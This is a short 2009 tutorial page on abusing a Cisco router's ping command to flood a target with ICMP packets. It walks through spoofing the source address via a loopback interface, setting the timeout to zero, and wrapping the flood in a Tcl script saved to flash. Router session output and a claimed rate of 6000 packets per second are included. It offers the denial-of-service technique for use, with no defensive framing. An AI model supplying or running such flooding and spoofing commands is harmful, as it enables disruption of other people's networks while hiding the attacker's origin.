cisco PING Command for icmp FLooding
PING
it's very easy to abuse the Ping command, for a simple ICMP Flooding attack, and if you like, you can create a spoofed Source IP.
Remember the Ping Options:
evil-router#ping 1.2.3.4 ?
  data      specify data pattern
  df-bit    enable do not fragment bit in IP header
  repeat    specify repeat count
  size      specify datagram size
  source    specify source address or name
  timeout   specify timeout interval
  validate  validate reply data
  <CR>
Some Options are very usefull, if you put it together in the right way.
- First you must create a Loopback Interface with the IP address, you like to spoofe.
- then find out, what you like to do, Small packets, for flooding, or large Packets for filling up the Line.The Option Size can be between 38 to ~18000
- repeat is simlpe the couter for the packages.
- and now "timeout" is the timer to wait for the answer, but for flooding, we don't like to wait for the answer, and we fix the timeout to zero "0"
evil-router#conf t
 Configuration mode locked exclusively. The lock will be cleared once you exit out of configuration mode using end/exit
Enter configuration commands, one per line.  End with CNTL/Z.
evil-router(config)#interface loopback 1
evil-router(config-if)#ip address 1.2.3.4 255.255.255.255
evil-router(config-if)#no shutdown
evil-router(config-if)#exit
evil-router(config)#exit
evil-router#
evil-router#ping 192.168.1.1 source 1.2.3.4 repeat 10 size 64 timeout 0

Type escape sequence to abort.
Sending 10, 64-byte ICMP Echos to 192.168.1.1, timeout is 0 seconds:
Packet sent with a source address of 1.2.3.4
..........
Success rate is 0 percent (0/10)

With this smale Script, i create on a 100Mbit/s link over 6000 ICMP packets/sec. on a Cisco 1803.

Ping optimization
Ping Flooding Tips
If You start a Ping Flooding from a Serial line like CONSOLE, the Output from the Ping commands slow down the packetsending, because of the Serial Output, default 9600 bit/s.
More faster is, starting up the Flooding over a VTY. (ssh or if you like "telnet"), but you also "Output" Traffic on the Management network.
The main problem its the Output with "....." or "!!!!", but you can reduce that, if you put the ping command in a simple tcl ONE-Line Script.
evil-router#tclsh
evil-router(tcl)#puts [open "flash:pingflood.tcl" w+] {
+>puts "Starting Flooding Target"
+>exec "ping 192.168.1.1 source 1.2.3.4 repeat 10000 timeout 0 size 64"
+>puts "Stopping Flooding Target"
+>}

evil-router(tcl)#exit

evil-router#dir pingflood.tcl
Directory of flash:/pingflood.tcl

   27  -rw-         137  Mar 30 2009 18:35:24 +00:00  pingflood.tcl

64020480 bytes total (40140800 bytes free)

evil-router#tclsh pingflood.tcl
Starting Flooding Target
Stopping Flooding Target

evil-router#

(c) 2009 by packetlevel.ch / last update: 30.03.2009